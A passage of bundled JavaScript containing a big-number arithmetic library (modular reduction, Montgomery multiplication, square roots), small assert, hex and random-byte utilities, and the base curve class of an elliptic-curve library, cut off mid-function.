            while(a.isEven())a.iushrn(1);
            while(b.isEven())b.iushrn(1);
            var r = a.cmp(b);
            if (r < 0) {
                // Swap `a` and `b` to make `a` always bigger than `b`
                var t = a;
                a = b;
                b = t;
            } else if (r === 0 || b.cmpn(1) === 0) break;
            a.isub(b);
        }while (true);
        return b.iushln(shift);
    };
    // Invert number in the field F(num)
    BN.prototype.invm = function invm(num) {
        return this.egcd(num).a.umod(num);
    };
    BN.prototype.isEven = function isEven() {
        return (this.words[0] & 1) === 0;
    };
    BN.prototype.isOdd = function isOdd() {
        return (this.words[0] & 1) === 1;
    };
    // And first word and num
    BN.prototype.andln = function andln(num) {
        return this.words[0] & num;
    };
    // Increment at the bit position in-line
    BN.prototype.bincn = function bincn(bit) {
        assert(typeof bit === "number");
        var r = bit % 26;
        var s = (bit - r) / 26;
        var q = 1 << r;
        // Fast case: bit is much higher than all existing words
        if (this.length <= s) {
            this._expand(s + 1);
            this.words[s] |= q;
            return this;
        }
        // Add bit and propagate, if needed
        var carry = q;
        for(var i = s; carry !== 0 && i < this.length; i++){
            var w = this.words[i] | 0;
            w += carry;
            carry = w >>> 26;
            w &= 0x3ffffff;
            this.words[i] = w;
        }
        if (carry !== 0) {
            this.words[i] = carry;
            this.length++;
        }
        return this;
    };
    BN.prototype.isZero = function isZero() {
        return this.length === 1 && this.words[0] === 0;
    };
    BN.prototype.cmpn = function cmpn(num) {
        var negative = num < 0;
        if (this.negative !== 0 && !negative) return -1;
        if (this.negative === 0 && negative) return 1;
        this.strip();
        var res;
        if (this.length > 1) res = 1;
        else {
            if (negative) num = -num;
            assert(num <= 0x3ffffff, "Number is too big");
            var w = this.words[0] | 0;
            res = w === num ? 0 : w < num ? -1 : 1;
        }
        if (this.negative !== 0) return -res | 0;
        return res;
    };
    // Compare two numbers and return:
    // 1 - if `this` > `num`
    // 0 - if `this` == `num`
    // -1 - if `this` < `num`
    BN.prototype.cmp = function cmp(num) {
        if (this.negative !== 0 && num.negative === 0) return -1;
        if (this.negative === 0 && num.negative !== 0) return 1;
        var res = this.ucmp(num);
        if (this.negative !== 0) return -res | 0;
        return res;
    };
    // Unsigned comparison
    BN.prototype.ucmp = function ucmp(num) {
        // At this point both numbers have the same sign
        if (this.length > num.length) return 1;
        if (this.length < num.length) return -1;
        var res = 0;
        for(var i = this.length - 1; i >= 0; i--){
            var a = this.words[i] | 0;
            var b = num.words[i] | 0;
            if (a === b) continue;
            if (a < b) res = -1;
            else if (a > b) res = 1;
            break;
        }
        return res;
    };
    BN.prototype.gtn = function gtn(num) {
        return this.cmpn(num) === 1;
    };
    BN.prototype.gt = function gt(num) {
        return this.cmp(num) === 1;
    };
    BN.prototype.gten = function gten(num) {
        return this.cmpn(num) >= 0;
    };
    BN.prototype.gte = function gte(num) {
        return this.cmp(num) >= 0;
    };
    BN.prototype.ltn = function ltn(num) {
        return this.cmpn(num) === -1;
    };
    BN.prototype.lt = function lt(num) {
        return this.cmp(num) === -1;
    };
    BN.prototype.lten = function lten(num) {
        return this.cmpn(num) <= 0;
    };
    BN.prototype.lte = function lte(num) {
        return this.cmp(num) <= 0;
    };
    BN.prototype.eqn = function eqn(num) {
        return this.cmpn(num) === 0;
    };
    BN.prototype.eq = function eq(num) {
        return this.cmp(num) === 0;
    };
    //
    // A reduce context, could be using montgomery or something better, depending
    // on the `m` itself.
    //
    BN.red = function red(num) {
        return new Red(num);
    };
    BN.prototype.toRed = function toRed(ctx) {
        assert(!this.red, "Already a number in reduction context");
        assert(this.negative === 0, "red works only with positives");
        return ctx.convertTo(this)._forceRed(ctx);
    };
    BN.prototype.fromRed = function fromRed() {
        assert(this.red, "fromRed works only with numbers in reduction context");
        return this.red.convertFrom(this);
    };
    BN.prototype._forceRed = function _forceRed(ctx) {
        this.red = ctx;
        return this;
    };
    BN.prototype.forceRed = function forceRed(ctx) {
        assert(!this.red, "Already a number in reduction context");
        return this._forceRed(ctx);
    };
    BN.prototype.redAdd = function redAdd(num) {
        assert(this.red, "redAdd works only with red numbers");
        return this.red.add(this, num);
    };
    BN.prototype.redIAdd = function redIAdd(num) {
        assert(this.red, "redIAdd works only with red numbers");
        return this.red.iadd(this, num);
    };
    BN.prototype.redSub = function redSub(num) {
        assert(this.red, "redSub works only with red numbers");
        return this.red.sub(this, num);
    };
    BN.prototype.redISub = function redISub(num) {
        assert(this.red, "redISub works only with red numbers");
        return this.red.isub(this, num);
    };
    BN.prototype.redShl = function redShl(num) {
        assert(this.red, "redShl works only with red numbers");
        return this.red.shl(this, num);
    };
    BN.prototype.redMul = function redMul(num) {
        assert(this.red, "redMul works only with red numbers");
        this.red._verify2(this, num);
        return this.red.mul(this, num);
    };
    BN.prototype.redIMul = function redIMul(num) {
        assert(this.red, "redMul works only with red numbers");
        this.red._verify2(this, num);
        return this.red.imul(this, num);
    };
    BN.prototype.redSqr = function redSqr() {
        assert(this.red, "redSqr works only with red numbers");
        this.red._verify1(this);
        return this.red.sqr(this);
    };
    BN.prototype.redISqr = function redISqr() {
        assert(this.red, "redISqr works only with red numbers");
        this.red._verify1(this);
        return this.red.isqr(this);
    };
    // Square root over p
    BN.prototype.redSqrt = function redSqrt() {
        assert(this.red, "redSqrt works only with red numbers");
        this.red._verify1(this);
        return this.red.sqrt(this);
    };
    BN.prototype.redInvm = function redInvm() {
        assert(this.red, "redInvm works only with red numbers");
        this.red._verify1(this);
        return this.red.invm(this);
    };
    // Return negative clone of `this` % `red modulo`
    BN.prototype.redNeg = function redNeg() {
        assert(this.red, "redNeg works only with red numbers");
        this.red._verify1(this);
        return this.red.neg(this);
    };
    BN.prototype.redPow = function redPow(num) {
        assert(this.red && !num.red, "redPow(normalNum)");
        this.red._verify1(this);
        return this.red.pow(this, num);
    };
    // Prime numbers with efficient reduction
    var primes = {
        k256: null,
        p224: null,
        p192: null,
        p25519: null
    };
    // Pseudo-Mersenne prime
    function MPrime(name, p) {
        // P = 2 ^ N - K
        this.name = name;
        this.p = new BN(p, 16);
        this.n = this.p.bitLength();
        this.k = new BN(1).iushln(this.n).isub(this.p);
        this.tmp = this._tmp();
    }
    MPrime.prototype._tmp = function _tmp() {
        var tmp = new BN(null);
        tmp.words = new Array(Math.ceil(this.n / 13));
        return tmp;
    };
    MPrime.prototype.ireduce = function ireduce(num) {
        // Assumes that `num` is less than `P^2`
        // num = HI * (2 ^ N - K) + HI * K + LO = HI * K + LO (mod P)
        var r = num;
        var rlen;
        do {
            this.split(r, this.tmp);
            r = this.imulK(r);
            r = r.iadd(this.tmp);
            rlen = r.bitLength();
        }while (rlen > this.n);
        var cmp = rlen < this.n ? -1 : r.ucmp(this.p);
        if (cmp === 0) {
            r.words[0] = 0;
            r.length = 1;
        } else if (cmp > 0) r.isub(this.p);
        else if (r.strip !== undefined) // r is BN v4 instance
        r.strip();
        else // r is BN v5 instance
        r._strip();
        return r;
    };
    MPrime.prototype.split = function split(input, out) {
        input.iushrn(this.n, 0, out);
    };
    MPrime.prototype.imulK = function imulK(num) {
        return num.imul(this.k);
    };
    function K256() {
        MPrime.call(this, "k256", "ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f");
    }
    inherits(K256, MPrime);
    K256.prototype.split = function split(input, output) {
        // 256 = 9 * 26 + 22
        var mask = 0x3fffff;
        var outLen = Math.min(input.length, 9);
        for(var i = 0; i < outLen; i++)output.words[i] = input.words[i];
        output.length = outLen;
        if (input.length <= 9) {
            input.words[0] = 0;
            input.length = 1;
            return;
        }
        // Shift by 9 limbs
        var prev = input.words[9];
        output.words[output.length++] = prev & mask;
        for(i = 10; i < input.length; i++){
            var next = input.words[i] | 0;
            input.words[i - 10] = (next & mask) << 4 | prev >>> 22;
            prev = next;
        }
        prev >>>= 22;
        input.words[i - 10] = prev;
        if (prev === 0 && input.length > 10) input.length -= 10;
        else input.length -= 9;
    };
    K256.prototype.imulK = function imulK(num) {
        // K = 0x1000003d1 = [ 0x40, 0x3d1 ]
        num.words[num.length] = 0;
        num.words[num.length + 1] = 0;
        num.length += 2;
        // bounded at: 0x40 * 0x3ffffff + 0x3d0 = 0x100000390
        var lo = 0;
        for(var i = 0; i < num.length; i++){
            var w = num.words[i] | 0;
            lo += w * 0x3d1;
            num.words[i] = lo & 0x3ffffff;
            lo = w * 0x40 + (lo / 0x4000000 | 0);
        }
        // Fast length reduction
        if (num.words[num.length - 1] === 0) {
            num.length--;
            if (num.words[num.length - 1] === 0) num.length--;
        }
        return num;
    };
    function P224() {
        MPrime.call(this, "p224", "ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001");
    }
    inherits(P224, MPrime);
    function P192() {
        MPrime.call(this, "p192", "ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff");
    }
    inherits(P192, MPrime);
    function P25519() {
        // 2 ^ 255 - 19
        MPrime.call(this, "25519", "7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed");
    }
    inherits(P25519, MPrime);
    P25519.prototype.imulK = function imulK(num) {
        // K = 0x13
        var carry = 0;
        for(var i = 0; i < num.length; i++){
            var hi = (num.words[i] | 0) * 0x13 + carry;
            var lo = hi & 0x3ffffff;
            hi >>>= 26;
            num.words[i] = lo;
            carry = hi;
        }
        if (carry !== 0) num.words[num.length++] = carry;
        return num;
    };
    // Exported mostly for testing purposes, use plain name instead
    BN._prime = function prime(name) {
        // Cached version of prime
        if (primes[name]) return primes[name];
        var prime;
        if (name === "k256") prime = new K256();
        else if (name === "p224") prime = new P224();
        else if (name === "p192") prime = new P192();
        else if (name === "p25519") prime = new P25519();
        else throw new Error("Unknown prime " + name);
        primes[name] = prime;
        return prime;
    };
    //
    // Base reduction engine
    //
    function Red(m) {
        if (typeof m === "string") {
            var prime = BN._prime(m);
            this.m = prime.p;
            this.prime = prime;
        } else {
            assert(m.gtn(1), "modulus must be greater than 1");
            this.m = m;
            this.prime = null;
        }
    }
    Red.prototype._verify1 = function _verify1(a) {
        assert(a.negative === 0, "red works only with positives");
        assert(a.red, "red works only with red numbers");
    };
    Red.prototype._verify2 = function _verify2(a, b) {
        assert((a.negative | b.negative) === 0, "red works only with positives");
        assert(a.red && a.red === b.red, "red works only with red numbers");
    };
    Red.prototype.imod = function imod(a) {
        if (this.prime) return this.prime.ireduce(a)._forceRed(this);
        return a.umod(this.m)._forceRed(this);
    };
    Red.prototype.neg = function neg(a) {
        if (a.isZero()) return a.clone();
        return this.m.sub(a)._forceRed(this);
    };
    Red.prototype.add = function add(a, b) {
        this._verify2(a, b);
        var res = a.add(b);
        if (res.cmp(this.m) >= 0) res.isub(this.m);
        return res._forceRed(this);
    };
    Red.prototype.iadd = function iadd(a, b) {
        this._verify2(a, b);
        var res = a.iadd(b);
        if (res.cmp(this.m) >= 0) res.isub(this.m);
        return res;
    };
    Red.prototype.sub = function sub(a, b) {
        this._verify2(a, b);
        var res = a.sub(b);
        if (res.cmpn(0) < 0) res.iadd(this.m);
        return res._forceRed(this);
    };
    Red.prototype.isub = function isub(a, b) {
        this._verify2(a, b);
        var res = a.isub(b);
        if (res.cmpn(0) < 0) res.iadd(this.m);
        return res;
    };
    Red.prototype.shl = function shl(a, num) {
        this._verify1(a);
        return this.imod(a.ushln(num));
    };
    Red.prototype.imul = function imul(a, b) {
        this._verify2(a, b);
        return this.imod(a.imul(b));
    };
    Red.prototype.mul = function mul(a, b) {
        this._verify2(a, b);
        return this.imod(a.mul(b));
    };
    Red.prototype.isqr = function isqr(a) {
        return this.imul(a, a.clone());
    };
    Red.prototype.sqr = function sqr(a) {
        return this.mul(a, a);
    };
    Red.prototype.sqrt = function sqrt(a) {
        if (a.isZero()) return a.clone();
        var mod3 = this.m.andln(3);
        assert(mod3 % 2 === 1);
        // Fast case
        if (mod3 === 3) {
            var pow = this.m.add(new BN(1)).iushrn(2);
            return this.pow(a, pow);
        }
        // Tonelli-Shanks algorithm (Totally unoptimized and slow)
        //
        // Find Q and S, that Q * 2 ^ S = (P - 1)
        var q = this.m.subn(1);
        var s = 0;
        while(!q.isZero() && q.andln(1) === 0){
            s++;
            q.iushrn(1);
        }
        assert(!q.isZero());
        var one = new BN(1).toRed(this);
        var nOne = one.redNeg();
        // Find quadratic non-residue
        // NOTE: Max is such because of generalized Riemann hypothesis.
        var lpow = this.m.subn(1).iushrn(1);
        var z = this.m.bitLength();
        z = new BN(2 * z * z).toRed(this);
        while(this.pow(z, lpow).cmp(nOne) !== 0)z.redIAdd(nOne);
        var c = this.pow(z, q);
        var r = this.pow(a, q.addn(1).iushrn(1));
        var t = this.pow(a, q);
        var m = s;
        while(t.cmp(one) !== 0){
            var tmp = t;
            for(var i = 0; tmp.cmp(one) !== 0; i++)tmp = tmp.redSqr();
            assert(i < m);
            var b = this.pow(c, new BN(1).iushln(m - i - 1));
            r = r.redMul(b);
            c = b.redSqr();
            t = t.redMul(c);
            m = i;
        }
        return r;
    };
    Red.prototype.invm = function invm(a) {
        var inv = a._invmp(this.m);
        if (inv.negative !== 0) {
            inv.negative = 0;
            return this.imod(inv).redNeg();
        } else return this.imod(inv);
    };
    Red.prototype.pow = function pow(a, num) {
        if (num.isZero()) return new BN(1).toRed(this);
        if (num.cmpn(1) === 0) return a.clone();
        var windowSize = 4;
        var wnd = new Array(1 << windowSize);
        wnd[0] = new BN(1).toRed(this);
        wnd[1] = a;
        for(var i = 2; i < wnd.length; i++)wnd[i] = this.mul(wnd[i - 1], a);
        var res = wnd[0];
        var current = 0;
        var currentLen = 0;
        var start = num.bitLength() % 26;
        if (start === 0) start = 26;
        for(i = num.length - 1; i >= 0; i--){
            var word = num.words[i];
            for(var j = start - 1; j >= 0; j--){
                var bit = word >> j & 1;
                if (res !== wnd[0]) res = this.sqr(res);
                if (bit === 0 && current === 0) {
                    currentLen = 0;
                    continue;
                }
                current <<= 1;
                current |= bit;
                currentLen++;
                if (currentLen !== windowSize && (i !== 0 || j !== 0)) continue;
                res = this.mul(res, wnd[current]);
                currentLen = 0;
                current = 0;
            }
            start = 26;
        }
        return res;
    };
    Red.prototype.convertTo = function convertTo(num) {
        var r = num.umod(this.m);
        return r === num ? r.clone() : r;
    };
    Red.prototype.convertFrom = function convertFrom(num) {
        var res = num.clone();
        res.red = null;
        return res;
    };
    //
    // Montgomery method engine
    //
    BN.mont = function mont(num) {
        return new Mont(num);
    };
    function Mont(m) {
        Red.call(this, m);
        this.shift = this.m.bitLength();
        if (this.shift % 26 !== 0) this.shift += 26 - this.shift % 26;
        this.r = new BN(1).iushln(this.shift);
        this.r2 = this.imod(this.r.sqr());
        this.rinv = this.r._invmp(this.m);
        this.minv = this.rinv.mul(this.r).isubn(1).div(this.m);
        this.minv = this.minv.umod(this.r);
        this.minv = this.r.sub(this.minv);
    }
    inherits(Mont, Red);
    Mont.prototype.convertTo = function convertTo(num) {
        return this.imod(num.ushln(this.shift));
    };
    Mont.prototype.convertFrom = function convertFrom(num) {
        var r = this.imod(num.mul(this.rinv));
        r.red = null;
        return r;
    };
    Mont.prototype.imul = function imul(a, b) {
        if (a.isZero() || b.isZero()) {
            a.words[0] = 0;
            a.length = 1;
            return a;
        }
        var t = a.imul(b);
        var c = t.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m);
        var u = t.isub(c).iushrn(this.shift);
        var res = u;
        if (u.cmp(this.m) >= 0) res = u.isub(this.m);
        else if (u.cmpn(0) < 0) res = u.iadd(this.m);
        return res._forceRed(this);
    };
    Mont.prototype.mul = function mul(a, b) {
        if (a.isZero() || b.isZero()) return new BN(0)._forceRed(this);
        var t = a.mul(b);
        var c = t.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m);
        var u = t.isub(c).iushrn(this.shift);
        var res = u;
        if (u.cmp(this.m) >= 0) res = u.isub(this.m);
        else if (u.cmpn(0) < 0) res = u.iadd(this.m);
        return res._forceRed(this);
    };
    Mont.prototype.invm = function invm(a) {
        // (AR)^-1 * R^2 = (A^-1 * R^-1) * R^2 = A^-1 * R
        var res = this.imod(a._invmp(this.m).mul(this.r2));
        return res._forceRed(this);
    };
})(module, this);

});

parcelRequire.register("koC21", function(module, exports) {
module.exports = $ed938ccf59a32f03$var$assert;
function $ed938ccf59a32f03$var$assert(val, msg) {
    if (!val) throw new Error(msg || "Assertion failed");
}
$ed938ccf59a32f03$var$assert.equal = function assertEqual(l, r, msg) {
    if (l != r) throw new Error(msg || "Assertion failed: " + l + " != " + r);
};

});

parcelRequire.register("lC4vN", function(module, exports) {
"use strict";
var $fbc0a58a3f4350d8$var$utils = module.exports;
function $fbc0a58a3f4350d8$var$toArray(msg, enc) {
    if (Array.isArray(msg)) return msg.slice();
    if (!msg) return [];
    var res = [];
    if (typeof msg !== "string") {
        for(var i = 0; i < msg.length; i++)res[i] = msg[i] | 0;
        return res;
    }
    if (enc === "hex") {
        msg = msg.replace(/[^a-z0-9]+/ig, "");
        if (msg.length % 2 !== 0) msg = "0" + msg;
        for(var i = 0; i < msg.length; i += 2)res.push(parseInt(msg[i] + msg[i + 1], 16));
    } else for(var i = 0; i < msg.length; i++){
        var c = msg.charCodeAt(i);
        var hi = c >> 8;
        var lo = c & 0xff;
        if (hi) res.push(hi, lo);
        else res.push(lo);
    }
    return res;
}
$fbc0a58a3f4350d8$var$utils.toArray = $fbc0a58a3f4350d8$var$toArray;
function $fbc0a58a3f4350d8$var$zero2(word) {
    if (word.length === 1) return "0" + word;
    else return word;
}
$fbc0a58a3f4350d8$var$utils.zero2 = $fbc0a58a3f4350d8$var$zero2;
function $fbc0a58a3f4350d8$var$toHex(msg) {
    var res = "";
    for(var i = 0; i < msg.length; i++)res += $fbc0a58a3f4350d8$var$zero2(msg[i].toString(16));
    return res;
}
$fbc0a58a3f4350d8$var$utils.toHex = $fbc0a58a3f4350d8$var$toHex;
$fbc0a58a3f4350d8$var$utils.encode = function encode(arr, enc) {
    if (enc === "hex") return $fbc0a58a3f4350d8$var$toHex(arr);
    else return arr;
};

});


parcelRequire.register("7JHF0", function(module, exports) {
var $5a1e9a6ed4e8de8a$var$r;
module.exports = function rand(len) {
    if (!$5a1e9a6ed4e8de8a$var$r) $5a1e9a6ed4e8de8a$var$r = new $5a1e9a6ed4e8de8a$var$Rand(null);
    return $5a1e9a6ed4e8de8a$var$r.generate(len);
};
function $5a1e9a6ed4e8de8a$var$Rand(rand) {
    this.rand = rand;
}
module.exports.Rand = $5a1e9a6ed4e8de8a$var$Rand;
$5a1e9a6ed4e8de8a$var$Rand.prototype.generate = function generate(len) {
    return this._rand(len);
};
// Emulate crypto API using randy
$5a1e9a6ed4e8de8a$var$Rand.prototype._rand = function _rand(n) {
    if (this.rand.getBytes) return this.rand.getBytes(n);
    var res = new Uint8Array(n);
    for(var i = 0; i < res.length; i++)res[i] = this.rand.getByte();
    return res;
};

if (typeof self === "object") {
    if (self.crypto && self.crypto.getRandomValues) // Modern browsers
    $5a1e9a6ed4e8de8a$var$Rand.prototype._rand = function _rand(n) {
        var arr = new Uint8Array(n);
        self.crypto.getRandomValues(arr);
        return arr;
    };
    else if (self.msCrypto && self.msCrypto.getRandomValues) // IE
    $5a1e9a6ed4e8de8a$var$Rand.prototype._rand = function _rand(n) {
        var arr = new Uint8Array(n);
        self.msCrypto.getRandomValues(arr);
        return arr;
    };
    else if (typeof window === "object") // Old junk
    $5a1e9a6ed4e8de8a$var$Rand.prototype._rand = function() {
        throw new Error("Not implemented yet");
    };
} else // Node.js or Web worker with no crypto support
try {
    var $5a1e9a6ed4e8de8a$var$crypto = (parcelRequire("kjyEk"));
    if (typeof $5a1e9a6ed4e8de8a$var$crypto.randomBytes !== "function") throw new Error("Not supported");
    $5a1e9a6ed4e8de8a$var$Rand.prototype._rand = function _rand(n) {
        return $5a1e9a6ed4e8de8a$var$crypto.randomBytes(n);
    };
} catch (e) {}

});

parcelRequire.register("cP1GP", function(module, exports) {
"use strict";
var $955b8f041d2341cf$var$curve = module.exports;

$955b8f041d2341cf$var$curve.base = (parcelRequire("hSu7V"));

$955b8f041d2341cf$var$curve.short = (parcelRequire("eYNyQ"));

$955b8f041d2341cf$var$curve.mont = (parcelRequire("av2Yx"));

$955b8f041d2341cf$var$curve.edwards = (parcelRequire("dqmX9"));

});
parcelRequire.register("hSu7V", function(module, exports) {
"use strict";

var $jX0xT = parcelRequire("jX0xT");

var $gEVtY = parcelRequire("gEVtY");
var $d03ed95a59c9b218$var$getNAF = $gEVtY.getNAF;
var $d03ed95a59c9b218$var$getJSF = $gEVtY.getJSF;
var $d03ed95a59c9b218$var$assert = $gEVtY.assert;
function $d03ed95a59c9b218$var$BaseCurve(type, conf) {
    this.type = type;
    this.p = new $jX0xT(conf.p, 16);
    // Use Montgomery, when there is no fast reduction for the prime
    this.red = conf.prime ? $jX0xT.red(conf.prime) : $jX0xT.mont(this.p);
    // Useful for many curves
    this.zero = new $jX0xT(0).toRed(this.red);
    this.one = new $jX0xT(1).toRed(this.red);
    this.two = new $jX0xT(2).toRed(this.red);
    // Curve configuration, optional
    this.n = conf.n && new $jX0xT(conf.n, 16);
    this.g = conf.g && this.pointFromJSON(conf.g, conf.gRed);
    // Temporary arrays
    this._wnafT1 = new Array(4);
    this._wnafT2 = new Array(4);
    this._wnafT3 = new Array(4);
    this._wnafT4 = new Array(4);
    this._bitLength = this.n ? this.n.bitLength() : 0;
    // Generalized Greg Maxwell's trick
    var adjustCount = this.n && this.p.div(this.n);
    if (!adjustCount || adjustCount.cmpn(100) > 0) this.redN = null;
    else {
        this._maxwellTrick = true;
        this.redN = this.n.toRed(this.red);
    }
}
module.exports = $d03ed95a59c9b218$var$BaseCurve;
$d03ed95a59c9b218$var$BaseCurve.prototype.point = function point() {
    throw new Error("Not implemented");
};
$d03ed95a59c9b218$var$BaseCurve.prototype.validate = function validate() {
    throw new Error("Not implemented");
};
$d03ed95a59c9b218$var$BaseCurve.prototype._fixedNafMul = function _fixedNafMul(p, k) {
    $d03ed95a59c9b218$var$assert(p.precomputed);
    var doubles = p._getDoubles();
    var naf = $d03ed95a59c9b218$var$getNAF(k, 1, this._bitLength);
    var I = (1 << doubles.step + 1) - (doubles.step % 2 === 0 ? 2 : 1);
    I /= 3;
    // Translate into more windowed form
    var repr = [];
    var j;
    var nafW;
    for(j = 0; j < naf.length; j += doubles.step){
        nafW = 0;
        for(var l = j + doubles.step - 1; l >= j; l--)nafW = (nafW << 1) + naf[l];
        repr.push(nafW);
    }
    var a = this.jpoint(null, null, null);
    var b = this.jpoint(null, null, null);
    for(var i = I; i > 0; i--){
        for(j = 0; j < repr.length; j++){
            nafW = repr[j];
            if (nafW === i) b = b.mixedAdd(doubles.points[j]);
            else if (nafW === -i) b = b.mixedAdd(doubles.points[j].neg());
        }
        a = a.add(b);
    }
    return a.toP();
};
$d03ed95a59c9b218$var$BaseCurve.prototype._wnafMul = function _wnafMul(p, k) {
    var w = 4;
    // Precompute window
    var nafPoints = p._getNAFPoints(w);
    w = nafPoints.wnd;
    var wnd = nafPoints.points;
    // Get NAF form
    var naf = $d03ed95a59c9b218$var$getNAF(k, w, this._bitLength);
    // Add `this`*(N+1) for every w-NAF index
    var acc = this.jpoint(null, null, null);
    for(var i = naf.length - 1; i >= 0; i--){
        // Count zeroes
        for(var l = 0; i >= 0 && naf[i] === 0; i--)l++;
        if (i >= 0) l++;
        acc = acc.dblp(l);
        if (i < 0) break;
        var z = naf[i];
        $d03ed95a59c9b218$var$assert(z !== 0);
        if (p.type === "affine") {
            // J +- P
            if (z > 0) acc = acc.mixedAdd(wnd[z - 1 >> 1]);
            else acc = acc.mixedAdd(wnd[-z - 1 >> 1].neg());
        } else // J +- J
        if (z > 0) acc = acc.add(wnd[z - 1 >> 1]);
        else acc = acc.add(wnd[-z - 1 >> 1].neg());
    }
    return p.type === "affine" ? acc.toP() : acc;
};
$d03ed95a59c9b218$var$BaseCurve.prototype._wnafMulAdd = function _wnafMulAdd(defW, points, coeffs, len, jacobianResult) {
    var wndWidth = this._wnafT1;
    var wnd = this._wnafT2;
    var naf = this._wnafT3;
    // Fill all arrays
    var max = 0;
    var i;
    var j;
    var p;
    for(i = 0; i < len; i++){
        p = points[i];
        var nafPoints = p._getNAFPoints(defW);
        wndWidth[i] = nafPoints.wnd;
        wnd[i] = nafPoints.points;
    }
    // Comb small window NAFs
    for(i = len - 1; i >= 1; i -= 2){
        var a = i - 1;
        var b = i;
        if (wndWidth[a] !== 1 || wndWidth[b] !== 1) {
            naf[a] = $d03ed95a59c9b218$var$getNAF(coeffs[a], wndWidth[a], this._bitLength);
            naf[b] = $d03ed95a59c9b218$var$getNAF(coeffs[b], wndWidth[b], this._bitLength);
            max = Math.max(naf[a].length, max);
            max = Math.max(naf[b].length, max);
            continue;
        }
        var comb = [
            points[a],
            /* 1 */ null,
            /* 3 */ null,
            /* 5 */ points[b]
        ];
        // Try to avoid Projective points, if possible
        if (points[a].y.cmp(points[b].y) === 0) {
            comb[1] = points[a].add(points[b]);
            comb[2] = points[a].toJ().mixedAdd(points[b].neg());
        } else if (points[a].y.cmp(points[b].y.redNeg()) === 0) {
            comb[1] = points[a].toJ().mixedAdd(points[b]);
            comb[2] = points[a].add(points[b].neg());
        } else {
            comb[1] = points[a].toJ().mixedAdd(points[b]);
            comb[2] = points[a].toJ().mixedAdd(points[b].neg());
        }
        var index = [
            -3,
            /* -1 -1 */ -1,
            /* -1 0 */ -5,
            /* -1 1 */ -7,
            /* 0 -1 */ 0,
            /* 0 0 */ 7,
            /* 0 1 */ 5,
            /* 1 -1 */ 1,
            /* 1 0 */ 3
        ];
        var jsf = $d03ed95a59c9b218$var$getJSF(coeffs[a], coeffs[b]);
        max = Math.max(jsf[0].length, max);
        naf[a] = new Array(max);
        naf[b] = new Array(max);
        for(j = 0; j < max; j++){
            var ja = jsf[0][j] | 0;
            var jb = jsf[1][j] | 0;
            naf[a][j] = index[(ja + 1) * 3 + (jb + 1)];
            naf[b][j] = 0;
            wnd[a] = comb;
        }
    }
    var acc = this.jpoint(null, null, null);
    var tmp = this._wnafT4;
    for(i = max; i >= 0; i--){
        var k = 0;
        while(i >= 0){
            var zero = true;
            for(j = 0; j < len; j++){
                tmp[j] = naf[j][i] | 0;
                if (tmp[j] !== 0) zero = false;
            }
            if (!zero) break;
            k++;
            i--;
        }
        if (i >= 0) k++;
        acc = acc.dblp(k);
        if (i < 0) break;
        for(j = 0; j < len; j++){
            var z = tmp[j];
            p;
            if (z === 0) continue;
            else if (z > 0) p = wnd[j][z - 1 >> 1];
            else if (z < 0) p = wnd[j][-z - 1 >> 1].neg();
            if (p.type === "affine") acc = acc.mixedAdd(p);
            else acc = acc.add(p);
        }
    }
    // Zeroify references
    for(i = 0; i < len; i++)wnd[i] = null;
    if (jacobianResult) return acc;
    else return acc.toP();
};
function $d03ed95a59c9b218$var$BasePoint(curve, type) {
    this.curve = curve;
    this.type = type;
    this.precomputed = null;
}
$d03ed95a59c9b218$var$BaseCurve.BasePoint = $d03ed95a59c9b218$var$BasePoint;
$d03ed95a59c9b218$var$BasePoint.prototype.eq = function eq() {
    throw new Error("Not implemented");
};
$d03ed95a59c9b218$var$BasePoint.prototype.validate = function validate() {
    return this.curve.validate(this);
};
$d03ed95a59c9b218$var$BaseCurve.prototype.decodePoint = function decodePoint(bytes, enc) {
    bytes = $gEVtY.toArray(bytes, enc);
    var len = this.p.byteLength();
    // uncompressed, hybrid-odd, hybrid-even
    if ((bytes[0] === 0x04 || bytes[0] === 0x06 || bytes[0] === 0x07) && bytes.length - 1 === 2 * len) {
        if (bytes[0] === 0x06) $d03ed95a59c9b218$var$assert(bytes[bytes.length - 1] % 2 === 0);
        else if (bytes[0] === 0x07) $d03ed95a59c9b218$var$assert(bytes[bytes.length - 1] % 2 === 1);
        var res = this.point(bytes.slice(1, 1 + len), bytes.slice(1 + len, 1 + 2 * len));
        return res;
    } else if ((bytes[0] === 0x02 || bytes[0] === 0x03) && bytes.length - 1 === len) return this.pointFromX(bytes.slice(1, 1 + len), bytes[0] === 0x03);
    throw new Error("Unknown point format");
};
$d03ed95a59c9b218$var$BasePoint.prototype.encodeCompressed = function encodeCompressed(enc) {
    return this.encode(enc, true);
};
$d03ed95a59c9b218$var$BasePoint.prototype._encode = function _encode(compact) {
    var len = this.curve.p.byteLength();
    var x = this.getX().toArray("be", len);
    if (compact) return [
        this.getY().isEven() ? 0x02 : 0x03
    ].concat(x);
    return [
        0x04
    ].concat(x, this.getY().toArray("be", len));
};
$d03ed95a59c9b218$var$BasePoint.prototype.encode = function encode(enc, compact) {
    return $gEVtY.encode(this._encode(compact), enc);
};
$d03ed95a59c9b218$var$BasePoint.prototype.precompute = function precompute(power) {
    if (this.precomputed) return this;
    var precomputed = {
        doubles: null,
        naf: null,
        beta: null
    };
    precomputed.naf = this._getNAFPoints(8);
    precomputed.doubles = this._getDoubles(4, power);
    precomputed.beta = this._getBeta();
    this.precomputed = precomputed;
    return this;
};
$d03ed95a59c9b218$var$BasePoint.prototype._hasDoubles = function _hasDoubles(k) {
    if (!this.precomputed) return false;
    var doubles = this.precomputed.doubles;
    if (!doubles) return false;
    return doubles.points.length >= Math.ceil((k.bitLength() + 1) / doubles.step);
};
$d03ed95a59c9b218$var$BasePoint.prototype._getDoubles = function _getDoubles(step, power) {
    if (this.precomputed && this.precomputed.doubles) return this.precomputed.doubles;
    var doubles = [
        this
    ];
    var acc = this;
    for(var i = 0; i < power; i += step){
        for(var j = 0; j < step; j++)acc = acc.dbl();
        doubles.push(acc);
    }
    return {
        step: step,
        points: doubles
    };
};
$d03ed95a59c9b218$var$BasePoint.prototype._getNAFPoints = function _getNAFPoints(wnd) {
    if (this.precomputed && this.precomputed.naf) return this.precomputed.naf;
    var res = [
        this
    ];
    var max = (1 << wnd) - 1;
    var dbl = max === 1 ? null : this.dbl();
